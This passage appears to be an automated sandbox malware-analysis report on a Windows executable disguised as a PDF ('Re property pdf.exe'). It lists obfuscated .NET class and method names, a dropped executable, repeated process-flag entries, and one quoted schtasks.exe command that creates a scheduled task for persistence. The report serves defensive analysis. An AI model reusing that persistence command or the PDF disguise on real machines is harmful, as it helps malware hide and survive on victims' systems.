            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, TICT0AxeHdoKa33w18.csHigh entropy of concatenated method names: 'A6DtEUBVAR', 'lKWtD2fK8Q', 'sT4H4wTDn1', 'XWMHy27Fb4', 'zmJHg6muem', 'InZHmYduvq', 'UR6HdkWGjc', 'oeeHKJbsmJ', 'AUSHAxTOQt', 'tqCHvS45Pm'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, GftEJASTFDGfv78DMAJ.csHigh entropy of concatenated method names: 'WEs9IfLfJt', 'X9f95MoXXs', 'RZd9iloUf1', 'iuF97Kw8MI', 'rY99EPbFh6', 'MAd938Mh9e', 'wo89D51HFk', 'PvN9ZHwjfp', 'W9P9Y7TTH6', 'JB49xFtvgl'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, Vmj5w627oHZ811Ubrc.csHigh entropy of concatenated method names: 'ToString', 'd1xpaLPRED', 'sMppFDMye5', 'n3mp47TWAI', 'BgIpy0QMt3', 'Pmfpg6pQ1q', 'ngBpm2ZmT6', 'VQbpdHgrcj', 'lPapKjrepG', 'adcpAnP4ud'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, DMj7SKSb6E9x1jiomqP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DLFBs6J0VT', 'kDAB8O79qi', 'IUuB293KyN', 'UKaBrfxewq', 'fNTBQsK3Tg', 'jc1BeAYiKj', 'fPDBoEGdhP'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, ntkhga1giMCKkUj49f.csHigh entropy of concatenated method names: 'kpnbwACNuN', 'qA6bCYwc8c', 'JJfbWqqNS1', 'iOsbHPjCCB', 'w51bt4U2e3', 'VpnbJb4wWy', 'Gdvbf16WKd', 'XS6b1TQyuS', 'BWebLWttwp', 'tU1b0oEdVU'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, SfIMBKdykDOpRGjPCZ.csHigh entropy of concatenated method names: 'zOGfCUvXdw', 'h5nfH6EVis', 'GYHfJ5sBIG', 'qAdJP4igw4', 'cxwJz1QcZd', 'BOMfTD6v9J', 'nIefS1YwfN', 'GgJfGtpMwo', 'm3KfbqFdvX', 'IBcf6TvSRq'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, M7d0L8lHdoRaQ2Ztmp.csHigh entropy of concatenated method names: 'rfkJwP1Zqa', 'E8fJW0rAi6', 'NBmJtOQ9h6', 'GiqJfZ9eAV', 'YH6J1SSAAb', 'm9OtQjTqOj', 'xJ6tevGm48', 's54touTkAP', 'tYLtVCknq2', 'u4ptMYbYX9'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, PgmkSv6ErVfCPqNwCN.csHigh entropy of concatenated method names: 'LSuSfeWwPl', 'XfkS15tlcG', 'AHlS0olrPO', 'OeISnyrICT', 'C3wSX18A7d', 'mL8SpHdoRa', 'f9cCU5W3Oq3ABINF67', 'WPaxJeemeT8AfwJmcL', 'Bx8SSm2Fpe', 'iTuSbu0R4D'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, lG0cDsVMiZvZHMNb00.csHigh entropy of concatenated method names: 'iKlkCQMMUY', 'eqJkWTD2cD', 'm8PkH1X7A1', 'fPLktxjILe', 'soKkJVBakm', 'jnQkfdIP3c', 'gu9k1oB9Mk', 'h3TkL7LYa1', 'wFTk0EWDep', 'UlGknPuPWo'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, xf4RKpzpK525TBZTtR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wLa9qV6gmU', 'j6g9XtGI4O', 'Bpx9pY4lY4', 'Wx99U5BEIn', 'I8r9kwV6R8', 'q9v99GP6jI', 'IIn9BplqVL'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, BGr2U7YHlolrPOaeIy.csHigh entropy of concatenated method names: 'oUjH7nFB5C', 'kFHH3ahlxw', 'G4iHZtAgBb', 'HhsHYenLtI', 'yn1HXorw2C', 'b1VHp6lLF5', 'kGPHUTpEVC', 'zeTHkhH47m', 'LO8H9w50Jl', 'nrgHB2PNHf'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, kjuJGoMYe2T0JEnCE3.csHigh entropy of concatenated method names: 'NR2kld3CbT', 'nNJkF3NB68', 'IYmk4uHPW4', 'wHMkyKo5i4', 'EoOksJ2Lgt', 'dE9kgaqUvr', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, weWwPlZVfk5tlcGN3Y.csHigh entropy of concatenated method names: 'z62WsdIdTg', 'ztQW8mLuC9', 'hEZW2CZ9qi', 'a5xWrQghIj', 'w07WQMaxmy', 'troWetNnIr', 'Uh1WoWSsgb', 'OjcWVZeLli', 'unQWMVdkxl', 'vsBWP0tsT1'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, DNn5p4soX0GKBuqmbh.csHigh entropy of concatenated method names: 'yB1XvHPE33', 'xP8XOm7D4J', 'LdPXsBW4Ap', 'vioX8KcRSX', 'LfIXFS2bvt', 'dxRX4dNNhn', 'Eu9XyylppH', 'EycXghuQEZ', 'GpDXmmuUAd', 'VghXdwXCHd'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, hsM0fUPd5eRSTQBR3c.csHigh entropy of concatenated method names: 'dbJ9SpSwdD', 'HMq9boJXPk', 'H4V96RSsxR', 'sMc9CeMqyT', 'f0u9W3xJ9f', 'PJu9tfdr66', 'BM29JJtKGN', 'AZyko5xI2b', 'sULkVlSm2I', 'gZekMd4OLw'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, mihGmtGUwHCyDp2toL.csHigh entropy of concatenated method names: 'ELkigeGFV', 'fa57J5ECm', 'VQb3x3WMw', 'KnnD6iJf4', 'SIfYTDwjV', 'wLpxlKGUI', 'g0YwebpJGVoQXK8Iwp', 'sZeBZ1vkGqKnTP6ZRi', 'jYek8mB0c', 'PT6BxqAD2'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, gxCt1DjW5S79BIxSeC.csHigh entropy of concatenated method names: 'YLvqZ6eGjA', 'ICrqYBAAvc', 'f3kqlKiLhf', 'oklqFVLcsp', 'cSrqy6ZahJ', 'Fglqg2ZCW4', 'pZNqd6Q92W', 'wtKqKrjoWI', 'eRKqvHVd5C', 'HApqa99081'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, puSGRTW1eEyAnuCnAo.csHigh entropy of concatenated method names: 'Dispose', 'Qg8SM58MQl', 'Na9GFBwDFC', 'luOuuPp3eq', 'k0GSP0cDsM', 'zZvSzZHMNb', 'ProcessDialogKey', 'l01GTjuJGo', 'Ee2GST0JEn', 'fE3GGHsM0f'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, FqaNDsAmeevbvb9cux.csHigh entropy of concatenated method names: 'DmFfIltv02', 'rBlf5o7XbH', 'O24fioCeBn', 'TIOf7lCbH4', 'kqZfE0cBMt', 'cuVf3ic3xX', 'GIxfDTnl8d', 'T2CfZI0P6Z', 'DiGfYLu9hy', 'n89fxZU0rR'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, TICT0AxeHdoKa33w18.csHigh entropy of concatenated method names: 'A6DtEUBVAR', 'lKWtD2fK8Q', 'sT4H4wTDn1', 'XWMHy27Fb4', 'zmJHg6muem', 'InZHmYduvq', 'UR6HdkWGjc', 'oeeHKJbsmJ', 'AUSHAxTOQt', 'tqCHvS45Pm'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, GftEJASTFDGfv78DMAJ.csHigh entropy of concatenated method names: 'WEs9IfLfJt', 'X9f95MoXXs', 'RZd9iloUf1', 'iuF97Kw8MI', 'rY99EPbFh6', 'MAd938Mh9e', 'wo89D51HFk', 'PvN9ZHwjfp', 'W9P9Y7TTH6', 'JB49xFtvgl'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, Vmj5w627oHZ811Ubrc.csHigh entropy of concatenated method names: 'ToString', 'd1xpaLPRED', 'sMppFDMye5', 'n3mp47TWAI', 'BgIpy0QMt3', 'Pmfpg6pQ1q', 'ngBpm2ZmT6', 'VQbpdHgrcj', 'lPapKjrepG', 'adcpAnP4ud'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, DMj7SKSb6E9x1jiomqP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DLFBs6J0VT', 'kDAB8O79qi', 'IUuB293KyN', 'UKaBrfxewq', 'fNTBQsK3Tg', 'jc1BeAYiKj', 'fPDBoEGdhP'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, ntkhga1giMCKkUj49f.csHigh entropy of concatenated method names: 'kpnbwACNuN', 'qA6bCYwc8c', 'JJfbWqqNS1', 'iOsbHPjCCB', 'w51bt4U2e3', 'VpnbJb4wWy', 'Gdvbf16WKd', 'XS6b1TQyuS', 'BWebLWttwp', 'tU1b0oEdVU'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, SfIMBKdykDOpRGjPCZ.csHigh entropy of concatenated method names: 'zOGfCUvXdw', 'h5nfH6EVis', 'GYHfJ5sBIG', 'qAdJP4igw4', 'cxwJz1QcZd', 'BOMfTD6v9J', 'nIefS1YwfN', 'GgJfGtpMwo', 'm3KfbqFdvX', 'IBcf6TvSRq'
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, M7d0L8lHdoRaQ2Ztmp.csHigh entropy of concatenated method names: 'rfkJwP1Zqa', 'E8fJW0rAi6', 'NBmJtOQ9h6', 'GiqJfZ9eAV', 'YH6J1SSAAb', 'm9OtQjTqOj', 'xJ6tevGm48', 's54touTkAP', 'tYLtVCknq2', 'u4ptMYbYX9'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, PgmkSv6ErVfCPqNwCN.csHigh entropy of concatenated method names: 'LSuSfeWwPl', 'XfkS15tlcG', 'AHlS0olrPO', 'OeISnyrICT', 'C3wSX18A7d', 'mL8SpHdoRa', 'f9cCU5W3Oq3ABINF67', 'WPaxJeemeT8AfwJmcL', 'Bx8SSm2Fpe', 'iTuSbu0R4D'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, lG0cDsVMiZvZHMNb00.csHigh entropy of concatenated method names: 'iKlkCQMMUY', 'eqJkWTD2cD', 'm8PkH1X7A1', 'fPLktxjILe', 'soKkJVBakm', 'jnQkfdIP3c', 'gu9k1oB9Mk', 'h3TkL7LYa1', 'wFTk0EWDep', 'UlGknPuPWo'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, xf4RKpzpK525TBZTtR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wLa9qV6gmU', 'j6g9XtGI4O', 'Bpx9pY4lY4', 'Wx99U5BEIn', 'I8r9kwV6R8', 'q9v99GP6jI', 'IIn9BplqVL'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, BGr2U7YHlolrPOaeIy.csHigh entropy of concatenated method names: 'oUjH7nFB5C', 'kFHH3ahlxw', 'G4iHZtAgBb', 'HhsHYenLtI', 'yn1HXorw2C', 'b1VHp6lLF5', 'kGPHUTpEVC', 'zeTHkhH47m', 'LO8H9w50Jl', 'nrgHB2PNHf'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, kjuJGoMYe2T0JEnCE3.csHigh entropy of concatenated method names: 'NR2kld3CbT', 'nNJkF3NB68', 'IYmk4uHPW4', 'wHMkyKo5i4', 'EoOksJ2Lgt', 'dE9kgaqUvr', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, weWwPlZVfk5tlcGN3Y.csHigh entropy of concatenated method names: 'z62WsdIdTg', 'ztQW8mLuC9', 'hEZW2CZ9qi', 'a5xWrQghIj', 'w07WQMaxmy', 'troWetNnIr', 'Uh1WoWSsgb', 'OjcWVZeLli', 'unQWMVdkxl', 'vsBWP0tsT1'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, DNn5p4soX0GKBuqmbh.csHigh entropy of concatenated method names: 'yB1XvHPE33', 'xP8XOm7D4J', 'LdPXsBW4Ap', 'vioX8KcRSX', 'LfIXFS2bvt', 'dxRX4dNNhn', 'Eu9XyylppH', 'EycXghuQEZ', 'GpDXmmuUAd', 'VghXdwXCHd'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, hsM0fUPd5eRSTQBR3c.csHigh entropy of concatenated method names: 'dbJ9SpSwdD', 'HMq9boJXPk', 'H4V96RSsxR', 'sMc9CeMqyT', 'f0u9W3xJ9f', 'PJu9tfdr66', 'BM29JJtKGN', 'AZyko5xI2b', 'sULkVlSm2I', 'gZekMd4OLw'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, mihGmtGUwHCyDp2toL.csHigh entropy of concatenated method names: 'ELkigeGFV', 'fa57J5ECm', 'VQb3x3WMw', 'KnnD6iJf4', 'SIfYTDwjV', 'wLpxlKGUI', 'g0YwebpJGVoQXK8Iwp', 'sZeBZ1vkGqKnTP6ZRi', 'jYek8mB0c', 'PT6BxqAD2'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, gxCt1DjW5S79BIxSeC.csHigh entropy of concatenated method names: 'YLvqZ6eGjA', 'ICrqYBAAvc', 'f3kqlKiLhf', 'oklqFVLcsp', 'cSrqy6ZahJ', 'Fglqg2ZCW4', 'pZNqd6Q92W', 'wtKqKrjoWI', 'eRKqvHVd5C', 'HApqa99081'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, puSGRTW1eEyAnuCnAo.csHigh entropy of concatenated method names: 'Dispose', 'Qg8SM58MQl', 'Na9GFBwDFC', 'luOuuPp3eq', 'k0GSP0cDsM', 'zZvSzZHMNb', 'ProcessDialogKey', 'l01GTjuJGo', 'Ee2GST0JEn', 'fE3GGHsM0f'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, FqaNDsAmeevbvb9cux.csHigh entropy of concatenated method names: 'DmFfIltv02', 'rBlf5o7XbH', 'O24fioCeBn', 'TIOf7lCbH4', 'kqZfE0cBMt', 'cuVf3ic3xX', 'GIxfDTnl8d', 'T2CfZI0P6Z', 'DiGfYLu9hy', 'n89fxZU0rR'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, TICT0AxeHdoKa33w18.csHigh entropy of concatenated method names: 'A6DtEUBVAR', 'lKWtD2fK8Q', 'sT4H4wTDn1', 'XWMHy27Fb4', 'zmJHg6muem', 'InZHmYduvq', 'UR6HdkWGjc', 'oeeHKJbsmJ', 'AUSHAxTOQt', 'tqCHvS45Pm'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, GftEJASTFDGfv78DMAJ.csHigh entropy of concatenated method names: 'WEs9IfLfJt', 'X9f95MoXXs', 'RZd9iloUf1', 'iuF97Kw8MI', 'rY99EPbFh6', 'MAd938Mh9e', 'wo89D51HFk', 'PvN9ZHwjfp', 'W9P9Y7TTH6', 'JB49xFtvgl'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, Vmj5w627oHZ811Ubrc.csHigh entropy of concatenated method names: 'ToString', 'd1xpaLPRED', 'sMppFDMye5', 'n3mp47TWAI', 'BgIpy0QMt3', 'Pmfpg6pQ1q', 'ngBpm2ZmT6', 'VQbpdHgrcj', 'lPapKjrepG', 'adcpAnP4ud'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, DMj7SKSb6E9x1jiomqP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DLFBs6J0VT', 'kDAB8O79qi', 'IUuB293KyN', 'UKaBrfxewq', 'fNTBQsK3Tg', 'jc1BeAYiKj', 'fPDBoEGdhP'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, ntkhga1giMCKkUj49f.csHigh entropy of concatenated method names: 'kpnbwACNuN', 'qA6bCYwc8c', 'JJfbWqqNS1', 'iOsbHPjCCB', 'w51bt4U2e3', 'VpnbJb4wWy', 'Gdvbf16WKd', 'XS6b1TQyuS', 'BWebLWttwp', 'tU1b0oEdVU'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, SfIMBKdykDOpRGjPCZ.csHigh entropy of concatenated method names: 'zOGfCUvXdw', 'h5nfH6EVis', 'GYHfJ5sBIG', 'qAdJP4igw4', 'cxwJz1QcZd', 'BOMfTD6v9J', 'nIefS1YwfN', 'GgJfGtpMwo', 'm3KfbqFdvX', 'IBcf6TvSRq'
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, M7d0L8lHdoRaQ2Ztmp.csHigh entropy of concatenated method names: 'rfkJwP1Zqa', 'E8fJW0rAi6', 'NBmJtOQ9h6', 'GiqJfZ9eAV', 'YH6J1SSAAb', 'm9OtQjTqOj', 'xJ6tevGm48', 's54touTkAP', 'tYLtVCknq2', 'u4ptMYbYX9'
            Source: C:\Users\user\Desktop\Re property pdf.exeFile created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
